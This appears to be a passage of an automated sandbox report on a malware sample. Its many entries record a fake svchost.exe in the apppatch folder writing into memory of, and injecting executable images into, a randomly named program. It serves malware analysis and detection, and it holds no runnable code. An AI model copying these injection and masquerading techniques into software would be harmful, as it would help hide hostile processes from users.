    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: B82000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: F52000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: FD2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DD2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11D2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: BB2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 7E2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: C32000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1472000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DF2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E12000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 11C2000 value starts with: 4D5AJump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 652000 value starts with: 4D5AJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 870000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 871000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 872000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 8C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 820000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 821000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 822000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 875000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 27C2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2815000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D70000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D71000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D72000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: DC5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E10000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E11000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E12000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: E65000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2170000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2171000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2172000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 21C5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1220000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1221000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1222000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1275000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9D2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A25000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 12E2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1335000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A40000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A41000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A42000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A95000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 29B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2A05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2740000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2741000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2742000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2795000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: CB2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: D05000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2890000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2891000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2892000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28E5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1110000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1111000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1112000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1165000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 14B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1505000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2210000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2211000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2212000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2265000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EA2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2EF5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2860000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2861000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2862000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 28B5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 9F2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: A45000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B50000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B51000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2B52000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2BA5000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B0000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B1000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 13B2000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 1405000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2230000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2231000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2232000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2285000Jump to behavior
    Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\BnVZseFLtYCOCfzZtKyMzUjoYeuzgFlwoZxzRXeSfthzHtyRshtEiyXqPPHCNvNYySvEj\tGYLgZxMWmmBTD.exe base: 2980000Jump to behavior
